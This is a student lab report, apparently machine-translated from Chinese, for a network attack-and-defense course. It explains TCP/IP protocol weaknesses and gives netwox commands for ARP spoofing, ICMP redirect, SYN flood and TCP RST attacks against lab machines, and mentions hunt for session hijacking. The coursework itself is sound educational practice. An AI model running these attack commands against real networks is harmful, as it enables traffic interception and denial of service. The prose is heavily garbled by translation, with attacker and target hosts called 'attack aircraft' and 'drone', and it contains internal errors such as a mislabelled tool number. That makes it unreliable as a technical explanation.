20,199,111 2019-2020-2 "network attack and defense practice," the fifth week of work
1. Practice content
Network security attributes
From a security point of view property, confidentiality (confidentiality), integrity (intergrity) and availability (availability) constitute the three basic attributes of network security, also known as the Golden Triangle security model (CIA). The International Telecommunication Union (ITU) in the security system X.800 standard also defines two other network security attributes, including authenticity (authentication) and non-repudiation (Non-Repudiation)
-
Confidentiality: refers to information networks from unauthorized access and use of entities, usually based encryption algorithms to protect.
-
Integrity: refers to unauthorized property information can not be changed, that information remains untouched during storage and transmission, is not destroyed and missing features.
-
Availability: refers to entities authorized to access characteristic is used and demand-driven, can normally access the desired service information and access, i.e. when needed.
-
Authenticity: means ensuring that communicating parties are really entity it claims, rather than fake entity.
-
Non-repudiation: means ensuring that any party can not deny safe nature of the operations they have done, including the non-repudiation of their actions and non-repudiation time of occurrence of the behavior in communication, sometimes referred to as non-repudiation and auditability.
The basic model of network attacks
The basic model of network attacks following four: interception, interruption, tampering, forgery. Which intercepted a passive attack mode, attack techniques specific to sniffing and listening; interruption is an active attack, attack techniques specific to a denial of service; forgery attack techniques specific to deceive; tampering with identity fraud usually requires a combination of man in the middle attacks.
TCP / IP network protocol stack security flaws and attack techniques
TCP / IP network protocol stack employed in the design of the hierarchical model, into the network interface layer, an Internet layer, a transport layer and application layer, each layer is responsible for different functions, each having a corresponding network protocol, on each level there are some security issues, as follows
Network layer protocol attacks
IP source address spoofing
IP routing protocols only forwards the data treasure in the destination address in the design, which does not verify the authenticity of the original address. Malicious attacker modifies the IP protocol header to contain a different false IP address, to deceive the objectives and purpose of the hidden source.
Precautions include:
-
Using randomized initial sequence number, so that a remote attacker can not guess the serial number to deceive camouflage establish a TCP connection source address.
-
Using protocols such as transport layer security network IPsec, for transmission of data packets is encrypted.
-
Avoid trust policy-based IP addresses to user identity authentication mechanism based encryption algorithm instead.
-
Embodiment packet filtering on routers and gateways.
ARP spoofing
Attacker sends forged ARP messages over a wired Ethernet or wireless network for the MAC address spoofing counterfeit corresponding to the specific IP.
ARP protocol to the IP address is performed when the security shortcomings of the MAC address mapping inquiry, on the one hand the technical process and method of using the broadcast request packet mapping in the interrogating LAN segment, but the results did not verify the authenticity of the response, and the other ARP protocol aspects to improve efficiency, the ARP cache mechanism design, and will be active ARP reply be treated as valid information is accepted, which makes very easy to be injected into the ARP cache of fake IP address to MAC address mapping relationship, thus cheat.
Precautions include:
-
Mapping between static binding key host IP address and MAC address
-
Use the appropriate ARP prevention tools
-
VLAN segmentation using virtual subnet network topology
-
Encryption for data transmission
Routing ICMP redirect attack
An attacker sends a fake by pretending to be the router ICMP routing path control packets, such that the selected target host routing path dictated by the attacker to sniff or impersonation attack.
ICMP redirect attack is the use of ICMP redirect packet routing to change the host's routing table, sends a redirect message to the target machine, you can disguise himself as a router, the target machine datagram sent to attack aircraft to strengthen monitoring.
Methods include:
-
Some filtering ICMP packets according to the type
-
Set up a firewall filter
-
ICMP redirect messages of judgment is not from the local router
Transport Layer Attack
TCP RST attack
This technique is a method for TCP communication connection counterfeit interference. TCP reset packets to close out a direct TCP session connection.
TCP session hijacking attacks
For the attacker, must do is to pry message transfer between two hosts TCP ongoing communication, so that the attacker can know the source of the IP packet, the source TCP port number, destination IP , a destination TCP Pin, thereby requesting that one host to the next one to be received and ackseq seq TCP packet segment value. In this way, the legitimate host receives TCP packets before another legally sent by the host, the attacker sent a packet with a TCP payload, if the host receives the first attack packet based on the information to the host intercepted , you can put a legitimate TCP session is established between the attacker and the attacked host. Attack packets with payload enables the attacker to be a value required for the TCP packet to be received in the acknowledgment sequence number (ackseq) is changed, so that the host issues another legitimate host to attack the message is being rejected attack the host.
Precautions include:
-
Disable source routing on the host
-
Adopt measures to prevent ARP spoofing
-
Adopt measures to avoid the ICMP redirect
TCP SYN Flood Denial of Service Attack
Defect using TCP protocol, sending a large number of bogus TCP connection request, so that the attacked party depletion of resources (CPU or memory full load) attack.
Precautions include:
-
SYN-Cookie measures
-
Firewall address status monitoring technology
UDP Flood Denial of Service Attack
UDP flooding is a denial of service attack, in which a large number of User Datagram Protocol (UDP) packet is sent to the target server, and the response is designed to overwhelm the processing capabilities of the device. Firewall protection target server may also be due UDP flood depleted, resulting in a denial of service to legitimate traffic.
Precautions include:
-
Disable or filter monitoring and response services
-
Use a firewall and proxy mechanisms in the network to filter out some of the key locations unexpected network traffic
TCP / IP network protocol stack attack prevention measures
-
Surveillance, prevention and security reinforcement
-
Improved network security protocol
-
Next Generation Internet Protocol
2. practice
2.1 ARP spoofing attack
| Host computer | IP addresses | MAC address |
|---|---|---|
| Ubuntu attack aircraft | 192.168.6.9 | 00: 0c: 29: d3: e0: 97 |
| win drone | 192.168.6.124 | |
| seedUbuntu drone | 192.168.6.4 |
Netwox installed on Ubuntu apt-get install netwox
And then we would start ARP spoofing using the tool netwox
Input 5from the command line, the 80number of tools (ARP periodically transmitted data packets)
After obtaining format using tool 80, the input
netwox 80 -e 00:0c:29:d3:e0:97 -i 192.168.6.4 #周期性发送应答,告诉请求方192.168.6.4(seed靶机)的MAC地址为00:0c:29:d3:e0:97(攻击机)
In the win drone entered arp -asee win drones in the arp cache table changes, the attack is successful
2.2 ICMP redirect attack
No. 86 netwox use tools ICMP redirect attack, attack aircraft entered in the
netwox 86 -f "host 192.168.6.124" -g 192.168.6.9 -i 192.168.6.1 # 嗅探到192.168.6.124(win靶机)的数据包时,以192.168.6.1的名义发送ICMP重定向报文,使192.168.6.9(攻击机)成为其默认路由
Ethereal carried out with wireshark, you can see the data packets, attack aircraft during the win drone open a Web page as the default route
After the Internet routing table (the experiment win drone frequent error when entering the website, so replace 192.168.6.3 to win new drone, after solving the normal problems can not browse the Web, see question 1)
2.3 SYN Flood attack
win drone launched ftp connection and establish a connection
No. 86 using tools netwox of SYN Flood attacks, input
netwox 76 -i 192.168.6.3 -p 21 #ftp连接的端口号为21,若使用其他连接方式,端口号不同
At this point once again initiate ftp connection, shows the connection timeout
2.4 TCP RST attack
192.168.6.3 to 192.168.6.124 initiate ftp connection and establish a connection, then enter in attack aircraft
netwox 78 -i 192.168.6.124
Back to 192.168.6.3, see has been disconnected
2.5 TCP session hijacking attacks
Establish ftp connection on the same topic
Use hunt tools, apt-get install huntinstallation tools, type hunt opens
3. The problems and solutions encountered in the study
-
Question 1: frequent error when win drone into the page, it says "runtime error"
-
Problem 1 Solution: Check the settings do not let this type of error, after entering the "Internet Options" dialog box, switch to the "Advanced" tab in IE, then check the "Disable script debugging"
4. practice summary
-
The test operation took much time, understanding of the principles of practice before spending a lot of time to learn over time undergraduate some attacks, but also almost forgotten (sorry muddle undergraduate classes). At the same time reviewing these attacks also reviewed aspects of the content network
-
Forward while learning they often review backwards, not black fool breaking corn